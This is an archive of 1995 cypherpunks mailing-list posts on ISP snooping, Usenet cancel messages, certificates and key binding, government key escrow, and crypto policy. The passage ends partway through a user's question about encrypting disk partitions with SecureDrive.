    Perhaps having a crypto checksum on the shell (telnetd) to detect
        trojin software.
    Perhaps sendmail could public key encrypt mail on it's way to the
        customers directory.
    Perhaps just raising the customer awareness of security issues
        and methods at the ISP.  This could affect the mainstream
        user (joe sixpack) as well as the PGP user.
    Perhaps ISPs could offer a data archive service/site (foreign site)
        where data in the form of PGP encrypted E-mail can be saved and
        retrieved via a robot (something like majordomo).  That way,
        if your home computer breaks, burns, is stolen, or siezed. You
        can still retrieve your data at a later time.

Granted these methods do not prevent a determined attacker from squashing
an ISP cutomer.  However, it does raise the cost of the effort to single
out a user and attack him rather that grab cleartext from everyone.

-tom




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Erik E. Fair"  (Time Keeper) <fair@clock.org>
Date: Thu, 5 Oct 95 10:19:05 PDT
To: Rich Salz <rsalz@osf.org>
Subject: Re: Rethinking the utility of netnews "cancel" control messages
Message-ID: <v02110105ac99c03922dd@[204.179.132.4]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:50 10/5/95, Rich Salz wrote:
>Cancel/Supercede is a useful model -- architecting them out of Usenet
>is a very bad idea.  Ask Clarinet.

Is it? The principal effects of not having the mechanism is a slightly
higher disk storage requirement for netnews - something completely unheard
of in the annals of USENET.

The downsides of having the mechanism (especially unauthenticated) we see
now: official and unofficial squelching of articles that someone doesn't
like for whatever arbitrary or situational reason.

In the long run, which is the more detrimental effect? It isn't desireable
for systems to be perfectly efficient, if they generate imperfect results;
as I understand it, the ponderousness of our federal legislative system was
designed in for precisely this reason: they were optimizing for long term
correctness, instead of efficiency.

Frankly, I think that if the question were posed correctly, I'm sure that
Brad Templeton (President of Clarinet) would think carefully about
answering it, since it has quite a few aspects.

I'm just trying to stimulate a little more careful thought about this as a
philosopical issue, before you go whack on INN again...

Erik Fair







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tom Rollins <trollins@hns.com>
Date: Thu, 5 Oct 95 07:25:21 PDT
To: cypherpunks@toad.com
Subject: Re: Oct 14 meeting Agenda ? (DC Cypherpunks)
Message-ID: <199510051425.KAA00813@dcn92.hns.com>
MIME-Version: 1.0
Content-Type: text


> >>I figure that as long as we are going to receive...
> >>       ? a commercial message from Digex ?
> >>
> >>We might be able to tap their knowledge base in assesing
> >>the various risks and rewards available by using a Commercial
> >>ISP.
> >>
> >>After all, with the FBI and Scientologists waging war on
> >>the Internet ( capturing keystroaks, siezing computers,
> >>and rummaging through everyones E-mail ), There may be a
> >>way to make life a little more interesting for them.
> 
> >I will be glad to send in my two cents worth - I am not sure that
> >I understand the question though.
> 
> While, I believe in strong crypto for everyone (what cypherpunks doesn't),
> I also believe that much can be done to prevent the wholesale snooping
> of Commercial ISP customers data.  I believe that this data is snooped
> because the ISP's and large number of customers (ignorant of security)
> make this data too easy a target (cost effective).
> 
> While the NSA may follow it's motto (In GOD we trust, the rest we monitor).
> Others may take hostile actions agenst someone whose password or
> personal information has been obtained. (ex. drain bank account, or just
> send spam)
> 
> Some questions that I would like to ask...
> 
> 1 - Assuming that someone from an agengy or someone pretending to
>     be from an agency wanted to capture one or all the ISP customers
>     key presses.  What method would they use ?
> 
>     Would they capture the data at the phone company?
>     Would they tap the raw data stream at the initial ISP router ?
>     Would they route IP packets from the initial ISP router through their
>         own equipment before arriving at the ISP maching running the shell
>         account ?
>     Would they use a Trojin Shell (or telnetd) on a shell account ?
>     Would they inform the ISP and get his help or root access ?
> 
> 2 - What methods could be put into place by the ISP or it's customers
>     to help prevent this snooping activity ?
> 
>     Perhaps an alternative login method (like deslogin or idealogin)
>         trying to protect data through the phone company and IP route
>         to the target machine.
>     Perhaps having a crypto checksum on the shell (telnetd) to detect
>         trojin software.
>     Perhaps sendmail could public key encrypt mail on it's way to the
>         customers directory.
>     Perhaps just raising the customer awareness of security issues
>         and methods at the ISP.  This could affect the mainstream
>         user (joe sixpack) as well as the PGP user.
>     Perhaps ISPs could offer a data archive service/site (foreign site)
>         where data in the form of PGP encrypted E-mail can be saved and
>         retrieved via a robot (something like majordomo).  That way,
>         if your home computer breaks, burns, is stolen, or siezed. You
>         can still retrieve your data at a later time.
> 
> Granted these methods do not prevent a determined attacker from squashing
> an ISP cutomer.  However, it does raise the cost of the effort to single
> out a user and attack him rather that grab cleartext from everyone.
> 
> -tom
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 5 Oct 95 10:29:47 PDT
To: cypherpunks@toad.com
Subject: Re: Certificates, Attributes, Web of Trust
Message-ID: <ac9961b42202100433c4@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



I have often said "You are your key." That is, keys have priority over
names, even True Names. The biometric True Name identity of a person
holding a key is only _another attribute_ of the key. Maybe important,
maybe not. It depends on the nature of the transaction.

But I go further: a huge number of interesting applications of strong
crypto have no connections at all with physical persons, let alone with
True Names. Agents in computer transactions, applets fired across networks,
agoric entities in computational ecologies, BlackNet sorts of markets, and
on and on.

The notion that a cryptographic key needs to be tied to a physical person
is deeply flawed.

The talk of certification authorities is OK, so long as the practice is
_completely_  and "strongly" voluntary (*).

(* I think maybe we need a term like "strongly voluntary," to parallel
"strong crypto." A key escrow system which can have arbitrary escrow
holders--company lawyers, grandmothers, computers in other buildings,
etc.--is "strongly voluntary." A government-sanctioned program which
authorizes, approves, regulates, and controls escrow holders is *not*. GAK
is not strongly voluntary, even though it will be sold as a "voluntary"
system.)


--Tim May



Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com>
Date: Thu, 5 Oct 95 09:07:21 PDT
To: gerdw@cougar.vut.edu.au (David Gerard)
Subject: Re: FORGED CANCELS of posts on n.a.n-a.m
Message-ID: <9510051606.AA02119@ch1d157nwk>
MIME-Version: 1.0
Content-Type: text/plain


>  One thing that occurs to me: suppose I go to control, collect cancel
>  messages, and build myself a collection of M1's that will work with
>  a given M2?
>
>  That is, I can't actually invert the hashing function. But if a
>  given hash function is standard, then I can eventually build up a
>  collection of M1s for M2s that will let me cancel quite a few things
>  I may want to.  How many cancel messages come through in a day?

You would have to collect quite a few cancels just to get one pair of valid  
hashes for a message you want to cancel...  You don't even need to collect  
cancels from control; you could just start hashing 128-bit strings until you  
got one that hashed to M2.  The catch is you would have to hash on the order  
of 2^64 strings for MD5, for instance.  That's a lot of hashing to cancel one  
article...  It's likely going to be much less work to try to guess the  
passphrase used to generate M1.  There is also a better than average chance  
that the target used the same passphrase to lock multiple posts...


andrew




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Gilmore <gnu@toad.com>
Date: Thu, 5 Oct 95 11:35:17 PDT
To: cypherpunks
Subject: Re: Restrictions on Munitions _Imports_
In-Reply-To: <199510050659.XAA04557@comsec.com>
Message-ID: <9510051835.AA19648@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Peter D. Junger--Case Western Reserve University Law School--said:
> There is a United States Munitions List for imports that is
> administered by the Treasury Department, but cryptographic devices and
> software are not included on that list.

I agree with Peter.  I looked this up at one point.

The government has considered trying to impose import controls on
crypto, like they've considered every other option they could think
of.  The question is what it would buy them except more trouble from
the public.  NSA can't sustain a claim that it would help them, since
they aren't supposed to be spying on Americans anyway.  But in
Clipper-II, NSA risks effective export controls to advance FBI
wiretapping interests.  Now that NSA is in fully naked in bed with the
FBI, they could jointly claim some governmental interest in killing
off domestic privacy.  But that's what would land them in trouble with
the public.

I really think they would have done better to have just shut up about
crypto and not pushed the issue.  The more they tighten the screws,
the more agitated and educated the public gets.  For every Clipper
chip that has sold to a non-governmental party, ten Cypherpunks or
'punk sympathyzers have risen up and started writing code,
investigating, talking to their friends, publishing articles in the
press, and filing lawsuits.

Ten years ago it was pretty lonely to be a cryptographer.  Most of us
wouldn't be on this mailing list -- the list itself would probably not
exist -- if the government had just quietly let the export criteria
advance, year after year, and had let the quaint academics play with
their toys.  But they tried alternating between stonewalling us and
forcing crap down our throats.  The result has been that the public
now *cares* about crypto policy.  And the public will get what it
wants, in the long run, no matter what the impact on the privileges of
the current crop of bureaucrats.

	John





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Wei Dai <weidai@eskimo.com>
Date: Thu, 5 Oct 95 12:01:48 PDT
To: Cypherpunks <cypherpunks@toad.com>
Subject: subjective names and MITM
Message-ID: <Pine.SUN.3.91.951005111048.24409B-100000@eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


Neither certification hiearchies nor the PGP web-of-trust are very useful
because they try to bind True Names to keys and True Names have many
problems.  People can have duplicate names and can change their names
(what happens if I legally change my name to Bill Clinton and try to get
Verisign to certify my key under that name?), and often we don't care
about someone's True Name. 

Perhaps it is better to think of names as subjective identifiers, and
public keys as global ids.  That is, a person who has a collection of
public keys gives each of them a name, but different people can name their
keys differently.  Of course the holder of the corresponding private key
can help in the naming process (e.g., "Please call me Wei").  If two
people need to talk about a third party, they can refer to him by an
arbitrary name after establishing a common binding between his key and
that name. 

In this scheme, the man-in-the-middle problem goes away because you are 
no longer trying to communicate with a True Name, whose binding with a 
key can be spoofed, but rather with the key itself.  If the holder of 
that key chooses to act as a middle-man by relaying messages around, that 
is his business, and there is really nothing you can do about it.

Wei Dai




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Thu, 5 Oct 95 12:15:15 PDT
To: cypherpunks@toad.com
Subject: Re: Certificates, Attributes, Web of Trust
In-Reply-To: <ac9961b42202100433c4@[205.199.118.202]>
Message-ID: <30742DE1.588@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Timothy C. May wrote:
> 
> I have often said "You are your key." That is, keys have priority over
> names, even True Names. The biometric True Name identity of a person
> holding a key is only _another attribute_ of the key. Maybe important,
> maybe not. It depends on the nature of the transaction.
> 
> But I go further: a huge number of interesting applications of strong
> crypto have no connections at all with physical persons, let alone with
> True Names. Agents in computer transactions, applets fired across networks,
> agoric entities in computational ecologies, BlackNet sorts of markets, and
> on and on.
> 
> The notion that a cryptographic key needs to be tied to a physical person
> is deeply flawed.
> 
> The talk of certification authorities is OK, so long as the practice is
> _completely_  and "strongly" voluntary (*).

  How about if the systems allows you to get a certificate that
has any name in it that you want, where the issuer makes no
claims about the identity of the owner of the certificate?
How about if the software lets the user decide which CAs they
will accept certificates from?  Given these two features,
would you still consider requiring a certificate to be bad?

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Erik E. Fair"  (Time Keeper) <fair@clock.org>
Date: Thu, 5 Oct 95 12:14:32 PDT
To: Rich Salz <rsalz@osf.org>
Subject: Re: Rethinking the utility of netnews "cancel" control messages
Message-ID: <v02110108ac99decdf8f0@[204.179.132.4]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:34 10/5/95, Rich Salz wrote:
>I would like to put my corporate legal infrastructe on an internal secure
>conferencing system.  News (with crypto-signed articles) is ideal.
>Without a "destroy all copies" concept I cannot do this.
>        /r$

This, presumably, is a lawyer, discovery, lawsuit thing, right?

Erik







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Thu, 5 Oct 95 12:25:49 PDT
To: cypherpunks@toad.com
Subject: Re: Certificate proposal
In-Reply-To: <9510021553.AA13756@tis.com>
Message-ID: <199510051924.MAA25839@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

(...WAY behind in cypherpunks mail...)

Carl Ellison <cme@TIS.COM> writes:
>Let me propose an alternative unique name: the public key (or a good hash
>of it).  The public key has an advantage over both X.509 and PGP names.
>The binding between it and its human being is testable.  You can challenge
>the human in question to sign something.

I don't understand this whole discussion.  A certificate is a signed
binding of a key and a unique name, right?  If the proposal here is
that the unique name be a hash of the key, you are suggesting a signed
binding of a key with its hash!  What is the point of a certificate
which binds a key to its hash?  What is such a certificate asserting?
It seems to be saying nothing at all.  Anybody can already tell if a
hash is right, for all the good that does you.  It's like a notarized
statement that 2+2=4.  I don't see the point.  As Carl goes on to say:

>Assuming you use a public key as the unique name, you end up with a much
>simplified certificate.  In fact, the notion of "certificate" may go away,
>in the sense that the certificate binds a key to a person through a unique
>name.  The person binds himself to his key, on challenge (or on any message
>signature).

If in fact this is just a suggestion that we not have certificates, that
may have some value.  But as a literal suggestion that certificates bind
a key hash to a key, that just doesn't make sense to me.

The thing to keep in mind is, why do we want certificates?  Why not just
use unsigned keys?  If I encrypt a message for Carl based on some key I
found lying around somewhere which someone told me is his, and I send it
to his mailbox, and I get a reply back, how secure is that?  We all know
that you don't get the full security of the encryption if you do this.
Man in the middle attacks might not be easy to do in such a situation but
they are certainly possible.  It is such attacks that certificates (including
PGP key signatures) are designed to prevent.

I'd like to see some grounding of this discussion in terms of the role of
certificates, and ways to prevent man in the middle attacks.  I certainly
have no love for facist worldwide ID cards and hierarchical, organization
based naming schemes, but just using any old key because it seems to work
OK most of the time isn't going to fly IMO.

Hal

-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQBVAwUBMHQw5BnMLJtOy9MBAQEDFQIAxvq8EC5zBMvUYGjwMUb2LDy/kt0gP19Z
S8BY+fxswuQCIqyet6WqddtVNyBE6QlO7XTTOX5RtZvMLHLN0YVp3A==
=Bq7+
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Philipp <adam@rosa.com>
Date: Thu, 5 Oct 95 12:51:49 PDT
To: cypherpunks@toad.com
Subject: AEgis Windoze PGP Shell (with location...sorry)
Message-ID: <9510051951.AA22108@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Aegis can be reached at:

http://iquest.com/~aegisrc/


sorry for leaving that out las time....

    -Adam


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMHOOA2/ZTaRmpgTFAQFioQf/WYR7o5SACijZpdZ1XZHtP4X/BXprVkVV
/GX/eB8jbkDaCffuIWoz34dxN5PpSXQPAbE53ZGcJEiIuYdl9CLloJj12yZFS3Bx
wa0988Fz374xmgL2VA6HllQwTBjab7v6vk565RG+Rtf7t7DWGIORP5WFDbDKJ4FR
yhxnPhFi/LA20aBrBjY9bfPMuFdUm+teBVjzNsgGmsTQov72iosuMh0IYhqcaBpR
ndaRdpp1ntcD6A2xPn+wfEYLcLUR34YbJVHmYwN3WJuhbNbhS4x4Aa0KFE9Sbi5W
bYt9wnqE0+uywTJb2Z8WUaH+0UfgeE/GNZvDe8jEp6oSUhaBs0R0LA==
=9ZIj
-----END PGP SIGNATURE-----

--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\
|PGP key available on my home page|Unauthorized interception violates |
|    http://www.rosa.com/~adam    |federal law (18 USC Section 2700 et|
|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-|seq.). In any case, PGP encrypted  |
|SUB ROSA: Confidential,          |communications are preferred for   | 
|secret, not for publication.     |sensitive materials.               |
\-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Thu, 5 Oct 95 09:51:45 PDT
To: cypherpunks@toad.com
Subject: Re: Rethinking the utility of netnews "cancel" control messages
Message-ID: <9510051650.AA16253@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


Cancel/Supercede is a useful model -- architecting them out of Usenet
is a very bad idea.  Ask Clarinet.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Ellison <cme@TIS.COM>
Date: Thu, 5 Oct 95 10:06:33 PDT
To: cwe@it.kth.se
Subject: re. GAK - (was Re: Europe)
In-Reply-To: <199510050740.AAA04867@comsec.com>
Message-ID: <9510051703.AA25582@tis.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>Date: Wed, 04 Oct 1995 12:58:24 +0100
>From: Christian Wettergren <cwe@it.kth.se>


>| Sweden: The authorities have not yet said anything at all about
>| where they stand in the GAK controversy. Probably very few have
>| heard about it. 

[...]

>So lets go off and think hard about good (culture-related) arguments
>why this is a bad idea. We'll gonna have to look really nice, and
>say some sensible things. :-)


Crypto is used for making sure that insiders get in while outsiders are
kept out of encrypted files/messages.

Strong crypto does a better job of keeping outsiders out.

Things like TIS CKE are mechanisms for making sure that insiders continue
to get in, in spite of mishaps with their keys.


Any such system can be evaluated on its technical merits (does it really
separate the insiders from the outsiders as well as it claims to?) (does it
survive various disasters (because if it doesn't survive, it can't keep
insiders in)?)


This is a separate topic from GAK -- which boils down to the Government's
claim that it should be listed as an insider for everybody.


That's what needs to be brought to everyone's attention.

 - Carl

+--------------------------------------------------------------------------+
|Carl M. Ellison      cme@tis.com    http://www.clark.net/pub/cme	   |
|Trusted Information Systems, Inc.   http://www.tis.com/                   |
|3060 Washington Road          PGP 2.6.2:  61E2DE7FCB9D7984E9C8048BA63221A2|
|Glenwood MD  21738         Tel:(301)854-6889      FAX:(301)854-5363       |
+--------------------------------------------------------------------------+

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMHQP11QXJENzYr45AQGLTwQAnZheg0W7qMbX4SuWExsFuVj9K4bVeBQ0
KV0B+xVY259TMRBU/U6seneQ9hY/xxsqBb+fKLBI99GRcT0+4bun21TprfBiPR2v
bsH/ZK6g3v5pexY8NlOv1bl9FIa1EoytMOVAsJhBtW4hddFa+tcsQSRNAWN2yoXk
u5cGLzUSIx4=
=BY+c
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ulf.Moeller@hamburg.netsurf.de (Ulf Moeller)
Date: Thu, 5 Oct 95 10:09:32 PDT
To: cypherpunks@toad.com
Subject: Re: Elementrix Press Release
In-Reply-To: <306C7A37@hamachi>
Message-ID: <m0t0p9k-000BVpC@ulf.mali.sub.org>
MIME-Version: 1.0
Content-Type: text/plain


>    "Elementrix has found a logical way to generate non-algorithmic,
>dynamically changing keys at two separate sites without transmitting
>them on the line and without using parallel lines," said Dr. David Kahn,

Obviously they have invented a telepathic key exchange scheme.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Thu, 5 Oct 95 10:35:30 PDT
To: fair@clock.org
Subject: Re: Rethinking the utility of netnews "cancel" control messages
Message-ID: <9510051734.AA16383@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


I would like to put my corporate legal infrastructe on an internal secure
conferencing system.  News (with crypto-signed articles) is ideal.
Without a "destroy all copies" concept I cannot do this.
	/r$





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryce <wilcoxb@nagina.cs.colorado.edu>
Date: Thu, 5 Oct 95 12:42:50 PDT
To: "Erik E. Fair" (Time Keeper) <fair@clock.org>
Subject: Re: Rethinking the utility of netnews "cancel" control messages
In-Reply-To: <v02110105ac99c03922dd@[204.179.132.4]>
Message-ID: <199510051942.NAA03482@nagina.cs.colorado.edu>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

 "Erik E. Fair" (Time Keeper) <fair@clock.org> wrote:
> At 9:50 10/5/95, Rich Salz wrote:
> >Cancel/Supercede is a useful model -- architecting them out of Usenet
> >is a very bad idea.  Ask Clarinet.
> 
> Is it? The principal effects of not having the mechanism is a slightly
> higher disk storage requirement for netnews - something completely unheard
> of in the annals of USENET.
> 
> The downsides of having the mechanism (especially unauthenticated) we see
> now: official and unofficial squelching of articles that someone doesn't
> like for whatever arbitrary or situational reason.

<snip>


Look just replace "cancel" with "mark as worthless and sign".  Then 
each reader may choose to "honor" the "cancel" or not.  If you are 
reading clari.news.world then you completely "honor" cancels signed by 
ClariNet.  If you are reading alt.religion.scientology, then you have 
your user agent specifically bring "cancelled" articles to your 
attention for reading.  :-)


(As an aside this serves for moderation as well.  Just tell your
user agent to honor messages marked as "cancelled, signed Bob The 
Moderator" and you have entered a moderated newsgroup.  And the 
protocol that's gonna bring it to you?  NoCeM and its relatives.  Real 
Soon Now, I think.)


Bryce

signatures follow


            "To strive, to seek, to find and not to yield."   
    <a href="http://ugrad-www.cs.colorado.edu/~wilcoxb/Niche.html">

                          bryce@colorado.edu                   </a>

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Automatic PGP clearsigning under Unix with Bryce's Auto-PGP v1.0

iQCVAwUBMHQ0jfWZSllhfG25AQE5MgP8Chmh7dZkdGmNCGxuL3nrKZsxrv7P8RnK
tJKPUQMEpNyH7Xd4Iu4p5P3HXg3HIxo/73ALewE75cN3Zg8tV2pw0pPovPuE416M
uaTs6FhTgSjh6+v3H/rt/dNqVgMfPAqPqSST3OESH2P2i6C+IkLEr4eglJWkgYJ9
L3bXB6l6IPQ=
=mw+K
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryce <wilcoxb@nagina.cs.colorado.edu>
Date: Thu, 5 Oct 95 12:46:48 PDT
To: Rich Salz <rsalz@osf.org>
Subject: Re: Rethinking the utility of netnews "cancel" control messages
In-Reply-To: <9510051734.AA16383@sulphur.osf.org>
Message-ID: <199510051946.NAA03604@nagina.cs.colorado.edu>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

> I would like to put my corporate legal infrastructe on an internal secure
> conferencing system.  News (with crypto-signed articles) is ideal.
> Without a "destroy all copies" concept I cannot do this.


Um..  You can't give people copies of something and then destroy all 
copies of that thing unless you can trust those people to destroy
*their* copies of it on your request.  If you *can* trust them to do
this, then the ratings-system solution I mentioned a minute ago will
work.  Just ask everyone to set their useragents to "delete" when they
encounter a "deleted, signed The Boss" mark on an article.


Regards,

Bryce

signatures follow


            "To strive, to seek, to find and not to yield."   
    <a href="http://ugrad-www.cs.colorado.edu/~wilcoxb/Niche.html">

                          bryce@colorado.edu                   </a>

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Automatic PGP clearsigning under Unix with Bryce's Auto-PGP v1.0

iQCVAwUBMHQ2BfWZSllhfG25AQGD7QP9HtmYVNL0OHvlaPEXzRdFI/XXwzNVjjhK
QnDsK1Gxr9JXnTOORHjOuLNCp4L039UD3S43YU8Jhoo+/Gs1OHhUEK4fOlB9uV6G
QS4kvBSb00ygFSZSuEgyeGVEdlDhHBw9hA06lcc2UC11yU6TM7yZFn6ko3XRrIOR
0I3nIWalaWQ=
=FLQ9
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Thu, 5 Oct 95 10:53:31 PDT
To: cypherpunks@toad.com
Subject: SSL telnet vs. SSH. Comparison?
Message-ID: <199510051751.NAA03127@book.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Would somebody please compare for me SSL telnet vs. SSH in terms of
security, advantages, and disadvantages?

Thanks,
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMHQbESoZzwIn1bdtAQFgxgF/bx0sbAWQ2mFbwaSqcKSolepKNCC/kiNm
22gizTztznICXRPxh17VxkpiWwzcRZPv
=QD3j
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 5 Oct 95 11:56:37 PDT
To: Rick Johnson <rickj@microsoft.com>
Subject: Re: Comments on STT Spec Implementation Details
In-Reply-To: <9510040519.AA05397@netmail2.microsoft.com>
Message-ID: <199510051855.OAA05477@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Rick Johnson writes:
> We're very interested in feedback and specifics on this.  We worked to 
> keep _only_ the detail we felt required to implement STT -- the 
> language is intentionally terse.  However, it is in everyone's best 
> interest that the STT spec is completely understood and implementable.

My suggestion, which I made when Microsoft made a presentation at the
IETF meeting in Stockholm and then had the gall to say "oh, no, we
don't intend to publish an internet draft" is that you publish this as
an internet draft and try to shepard it through the IETF's
standardization process. You will, of course, be savaged, but that is
in the interests of everyone, including you.

The belief that companies can make more money by following proprietary
solutions and imposing them on the world as standards is falling
away. It is in Microsoft's interest that the standard that is adopted
for commerce be open, publically discussed at length, and brutally
critiqued. Losing a bit of control in exchange for actually getting
something that works out for you and your customers is in your interest.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mrm@netcom.com (Marianne Mueller)
Date: Thu, 5 Oct 95 15:19:33 PDT
To: cypherpunks-announce@toad.com
Subject: Oct 14 mtg - focus on java
Message-ID: <199510052213.PAA26024@netcom22.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Hi -

The Oct 14 cypherpunks meeting will be focussing on Java topics. 
I'm putting together an agenda, and finalizing the meeting location. 

It looks like we'll have someone from the Java group at Sun to talk about
what the current Java security policy is, and about Java and HotJava
security mechanisms. 

Doug Barnes and Amanda Chou will talk about JCrypt, which is a set
of Java wrappers for existing C encryption routines.  

If you'd like to talk at the Oct 14 meeting, please send me email with a 
description of your project, and I'll schedule you in.   

I'll send out mail early next week with the agenda, and letting you know
where the meeting will be held.    I'm trying to get a large conference
room at one of the Sun facilities. 

Marianne
mrm@netcom.com 
mrm@eng.sun.com 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Thu, 5 Oct 95 16:07:56 PDT
To: cypherpunks@toad.com
Subject: Re: Certificate proposal
In-Reply-To: <9510021553.AA13756@tis.com>
Message-ID: <3074646C.2418@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Hal wrote:
> 
> -----BEGIN PGP SIGNED MESSAGE-----
> 
> (...WAY behind in cypherpunks mail...)
> 
> Carl Ellison <cme@TIS.COM> writes:
> >Let me propose an alternative unique name: the public key (or a good hash
> >of it).  The public key has an advantage over both X.509 and PGP names.
> >The binding between it and its human being is testable.  You can challenge
> >the human in question to sign something.
> 
> I don't understand this whole discussion.  A certificate is a signed
> binding of a key and a unique name, right?  If the proposal here is
> that the unique name be a hash of the key, you are suggesting a signed
> binding of a key with its hash!  What is the point of a certificate
> which binds a key to its hash?  What is such a certificate asserting?
> It seems to be saying nothing at all.  Anybody can already tell if a
> hash is right, for all the good that does you.  It's like a notarized
> statement that 2+2=4.  I don't see the point.  As Carl goes on to say:
> 
> >Assuming you use a public key as the unique name, you end up with a much
> >simplified certificate.  In fact, the notion of "certificate" may go away,
> >in the sense that the certificate binds a key to a person through a unique
> >name.  The person binds himself to his key, on challenge (or on any message
> >signature).
> 
> If in fact this is just a suggestion that we not have certificates, that
> may have some value.  But as a literal suggestion that certificates bind
> a key hash to a key, that just doesn't make sense to me.
> 
> The thing to keep in mind is, why do we want certificates?  Why not just
> use unsigned keys?  If I encrypt a message for Carl based on some key I
> found lying around somewhere which someone told me is his, and I send it
> to his mailbox, and I get a reply back, how secure is that?  We all know
> that you don't get the full security of the encryption if you do this.
> Man in the middle attacks might not be easy to do in such a situation but
> they are certainly possible.  It is such attacks that certificates (including
> PGP key signatures) are designed to prevent.
> 
> I'd like to see some grounding of this discussion in terms of the role of
> certificates, and ways to prevent man in the middle attacks.  I certainly
> have no love for facist worldwide ID cards and hierarchical, organization
> based naming schemes, but just using any old key because it seems to work
> OK most of the time isn't going to fly IMO.

  I think the old idea of a certificate just binding a name and
a key is turning out to not be very useful.  That is why Netscape
Navigator 2.0 will support x509 version 3 certificates.  They allow
arbitrary attributes to be signed into a certificate.  In this new
world, you can think of a certificate as a way of binding a key with
various arbitrary attributes, one of which may be(but is not
required to be) a name.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@dorsai.dorsai.org>
Date: Thu, 5 Oct 95 16:43:08 PDT
To: cypherpunks@toad.com
Subject: Secure Drive questions...
Message-ID: <Pine.SUN.3.91.951005160110.26476B-100000@dorsai.dorsai.org>
MIME-Version: 1.0
Content-Type: text/plain


Hi, I recently got me a much larger hard drive and would like to encrypt 
more than one partition using SecureDrive.  I'm using an old 1.1 version 
which, when I log into one partition, the others vanish.  I'm using the 
same passphrase on both paritions.

I've never upgraded because the previous version did what I wanted it to 
do very well and I have never had a problem with it.  I've noticed that 
on some machines SecureDevice failed where SecureDrive 1.1 worked 
perfectly...  So I've stuck with that... but now, I'd rather not join the 
two partitions together if I can help it... too much work to copy 
everything off, repartition, restore, etc...  (This is a 1.2Gb WD Caviar 
drive using the Disk Manager crud that makes the drive visible to DOS by 
